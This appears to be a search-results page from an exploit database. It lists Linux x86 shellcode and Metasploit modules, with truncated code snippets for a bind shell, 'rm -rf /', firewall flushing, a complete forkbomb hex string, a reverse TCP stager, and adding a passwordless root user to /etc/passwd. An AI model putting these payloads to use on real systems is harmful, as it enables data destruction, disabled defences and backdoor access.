Lucene search
K

10 matches found

seebug.org
seebug.org
added 2009/06/09 12:0 a.m.18 views

linux/x86 bindport 8000 & execve iptables -F 176 bytes

No description provided by source. ; ; Title : Bindport TCP/8000 & execve iptables -F ; os : Linux x86 ; size : 176 bytes ; IP : localhost ; Port : 8000 ; Use : nc localhost 8000 ; ; Author : Jonathan Salwan ; Mail : submit AT shell-storm.org ; Web : http://www.shell-storm.org ; ; ; More shellcod...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/02/21 12:0 a.m.16 views

Linux/x86 - execve("rm -rf /")

No description provided by source. / By Kris Katterjohn 11/18/2006 45 byte shellcode to execve"rm -rf /" for Linux/x86 section .text global start start: ; execve"/bin/rm", "/bin/rm", "-r", "-f", "/", NULL , NULL push byte 11 pop eax cdq push edx push byte 0x2f mov edi, esp push edx push word 0x66...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2009/02/20 12:0 a.m.12 views

Linux/x86 - ipchains -F - 40 bytes

No description provided by source. / By Kris Katterjohn 11/18/2006 40 byte shellcode to flush ipchains for Linux x86 section .text global start start: ; execve"/sbin/ipchains", "/sbin/ipchains", "-F", NULL , NULL push byte 11 pop eax cdq push edx push word 0x462d mov ecx, esp push edx push word...

7.1AI score
Exploits0
Metasploit
Metasploit
added 2009/01/23 2:5 a.m.20 views

FTP Bounce Port Scanner

Enumerate TCP services via the FTP bounce PORT/LIST method. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'FTP Bounce Port Scanner', 'Description' = %q Enumerate TCP services via the FTP bounc...

7.1AI score
Exploits0
Metasploit
Metasploit
added 2009/01/09 5:39 a.m.17 views

PacketTrap TFTP Server 2.2.5459.0 DoS

The PacketTrap TFTP server version 2.2.5459.0 can be brought down by sending a special write request. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'PacketTrap TFTP Server 2.2.5459.0 DoS',...

5CVSS0.2AI score0.49167EPSS
Exploits3
Metasploit
Metasploit
added 2008/11/18 9:1 p.m.9 views

Linux Command Shell, Reverse TCP Stager (IPv6)

Spawn a command shell staged. Connect back to attacker over IPv6 This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework Linux Reverse TCP/IPv6 Stager module MetasploitModule CachedSize = 77 include Msf::Payload::Stager inclu...

7.4AI score
Exploits0
seebug.org
seebug.org
added 2006/11/18 12:0 a.m.16 views

linux/x86 /sbin/ipchains -F 41 bytes

No description provided by source. / By Kris Katterjohn 11/15/2006 41 byte shellcode to flush ipchains for Linux x86 section .text global start start: ; execve"/sbin/ipchains", "/sbin/ipchains", "-F", NULL , NULL push byte 11 pop eax xor edx, edx push edx push word 0x462d mov ecx, esp push edx pu...

7.1AI score
Exploits0
Exploit DB
Exploit DB
added 2006/11/17 12:0 a.m.26 views

linux/x86 - forkbomb 7 bytes

linux/x86 forkbomb 7 bytes. Shellcode exploit for linx86 platform / By Kris Katterjohn 8/29/2006 7 byte shellcode for a forkbomb section .text global start start: push byte 2 pop eax int 0x80 jmp short start / main char shellcode = "\x6a\x02\x58\xcd\x80\xeb\xf9"; void shellcode; // milw0rm.com...

7.4AI score
Exploits0
0day.today
0day.today
added 2006/11/17 12:0 a.m.22 views

linux/x86 forkbomb 7 bytes

Exploit for linux/x86 platform in category shellcode ========================== linux/x86 forkbomb 7 bytes ========================== / By Kris Katterjohn 8/29/2006 7 byte shellcode for a forkbomb section .text global start start: push byte 2 pop eax int 0x80 jmp short start / main char shellcode...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2006/11/17 12:0 a.m.33 views

linux/x86 - add root user r00t with no password to /etc/passwd 69 bytes

linux/x86 add root user r00t with no password to /etc/passwd 69 bytes. Shellcode exploit for linx86 platform / By Kris Katterjohn 11/14/2006 69 byte shellcode to add root user 'r00t' with no password to /etc/passwd for Linux/x86 section .text global start start: ; open"/etc//passwd", OWRONLY |...

0.1AI score
Exploits0
Rows per page
Query Builder